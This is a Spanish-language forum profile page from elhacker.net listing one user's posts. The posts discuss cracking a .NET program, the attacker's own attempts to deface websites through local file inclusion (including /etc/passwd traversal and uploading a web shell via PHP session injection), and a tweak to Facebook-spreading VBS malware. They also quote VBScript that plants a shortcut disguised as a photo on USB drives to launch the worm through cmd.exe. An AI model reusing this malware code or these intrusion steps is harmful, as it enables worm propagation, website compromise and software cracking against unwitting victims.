elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


  Mostrar Mensajes
Páginas: [1] 2 3
1  Programación / Ingeniería Inversa / Re: Ayuda con IDA y .net en: 1 Abril 2017, 05:03 am
Me respondo yo mismo, termine de crackear el programa con dnspy fue mucho mas facil
2  Programación / Ingeniería Inversa / Ayuda con IDA y .net en: 31 Marzo 2017, 11:13 am
Alguien me podria dar un alcanze de como patchear y editar manualmente en IDA porque lo estoy haciendo como lo hacia con otros programas (no .net) pero ahora no entiendo porque al cambiar manualmente algun dato no lo patchea :s
3  Seguridad Informática / Análisis y Diseño de Malware / Re: Duda sobre USB spread en: 18 Marzo 2014, 16:22 pm
Ah ok gracias eres un grande jaja, no sabia que no se podia usar espacios, gracias. Ahora toca pasarlo a delphi.

Saludos.
4  Seguridad Informática / Análisis y Diseño de Malware / Re: Duda sobre USB spread en: 18 Marzo 2014, 15:16 pm
La funcion replace que es para remplazar codenas a que viene?

Código
  1. replace(wscript.scriptname," ", chrw(34) & " " & chrw(34))
5  Seguridad Informática / Análisis y Diseño de Malware / Re: Duda sobre USB spread en: 18 Marzo 2014, 05:22 am
Cual es su sintaxis del argumento? sin el codigo como seria?
6  Seguridad Informática / Análisis y Diseño de Malware / Re: Duda sobre USB spread en: 18 Marzo 2014, 00:49 am
Para ser mas preciso en la linea

Código
  1. lnkobj.arguments = "/c start " & replace(wscript.scriptname," ", chrw(34) & " " & chrw(34)) & "&exit"


que argumentos debe tener un lnk para que ejecute un programa?
7  Seguridad Informática / Análisis y Diseño de Malware / Duda sobre USB spread en: 17 Marzo 2014, 23:59 pm
Alguien que sea tan amable de explicarme estas lineas que dejo de ejemplo MadAntrax en uno de sus post, no estoy muy familiarizado con este tipo de spread.
Código
  1. set lnkobj = WSS.createshortcut (drive.path & "\mifoto.lnk")
  2. lnkobj.windowstyle = 7
  3. lnkobj.targetpath = "cmd.exe"
  4. lnkobj.workingdirectory = ""
  5. lnkobj.arguments = "/c start " & replace(wscript.scriptname," ", chrw(34) & " " & chrw(34)) & "&exit"
  6. lnkobj.iconlocation = WSS.regread ("HKEY_LOCAL_MACHINE\software\classes\jpegfile\defaulticon\")
  7. lnkobj.save()
  8.  
8  Seguridad Informática / Análisis y Diseño de Malware / Re: [VBS] [SOURCE] Facebook y Twitter Spread en: 14 Marzo 2014, 17:34 pm
Para que el Spread Msg de Facebook sea funcional en Firefox deben poner

WS.SendKeys "+(%m)"

en vez de

WS.SendKeys "%m"

y aun sigue quedando funcional para firefox y chrome
9  Seguridad Informática / Nivel Web / Re: Encontrar logs en LFI en: 13 Marzo 2012, 05:45 am
Es algo antiguo el post, pero logre subir la shell mediante inyeccion en sesion php igualmente gracias
10  Seguridad Informática / Nivel Web / Encontrar logs en LFI en: 17 Febrero 2012, 06:58 am
Bueno esa es mi duda estoy practicando lfi y rfi pero hay mas webs para hacer lfi y defacear, hasta el momento no eh defaceado una por eso no tengo suficiente experiencia asi que mi pregunta es como encontrar la ruta de los logs para poder inyectar una shell:

Tengo esto por el momento:

Código:
/www/htdocs/www.web.com/index.php

ese es el directorio de la web supongo que el server es compartido porque al poner ../../../../../../../etc/passwd salen varios usuarios y no permite ataque rfi
Páginas: [1] 2 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines